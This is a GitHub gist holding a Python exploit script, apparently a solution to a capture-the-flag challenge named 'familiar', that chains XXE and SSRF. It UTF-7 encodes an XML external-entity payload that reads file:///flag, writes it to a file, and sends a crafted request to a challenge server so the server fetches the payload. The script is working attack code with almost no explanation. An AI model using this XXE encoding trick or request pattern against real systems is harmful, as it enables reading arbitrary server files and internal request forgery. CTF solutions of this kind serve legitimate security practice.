Skip to content

Instantly share code, notes, and snippets.

@stypr stypr/exploit.py
Created Nov 3, 2017

Embed
What would you like to do?
familiar (485pt) XXE + SSRF
#!/usr/bin/python -u
#-*- encoding: utf-8 -*-
import os
import sys
import requests
import json
from base64 import *
HOST = "core.eagle-jump.org"
# UTF-7 rough encoding
def utf7(s):
TABLE = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
f = ""
n = 0
for i in s:
#t = ord(i)
t = "00" + i.encode("hex")
th = []
for j in t:
if j.isalpha():
x = 10 + (ord(j) - ord('a'))
else:
x = int(j)
k = bin(x).lstrip('-0b').zfill(4)
th.append(k)
th = ''.join(th) + '00' # null padding
# divide to 6
hx = []
for j in range(0, len(th), 6):
hx.append(th[j:j+6])
ec = ""
for j in hx:
#print(">>>", j)
ec_idx = 0
pn = 0
for k in j:
pn += 1
m = pow(2, 6 - pn)
ec_idx += m * int(k)
if ec_idx < 63:
ec += TABLE[ec_idx]
f += "+" + ec + "-"
return f
# Craft Exploit
def write_exploit():
_header = '<?xml version="1.0" encoding="UTF-7" ?>'
_payload = "<!DOCTYPE foo [ "
_payload += "<!ELEMENT body ANY >"
_payload += '<!ENTITY xxe SYSTEM "file:///flag">'
_payload += "]>"
_payload += "<content><title>hi</title><body>&xxe;</body></content>"
_conv = _header + utf7(_payload)
f = open('ex.xml', 'wb')
f.write(_conv)
f.close()
# Send Request
def send_exploit():
global HOST
url = "http://familiar-lb-1196903378.ap-northeast-2.elb.amazonaws.com"
headers = {"Host": HOST}
query = "/?page=" + b64encode(headers["Host"] + "/ex")
url = url + query
return requests.get(url, headers=headers).text
write_exploit()
print send_exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.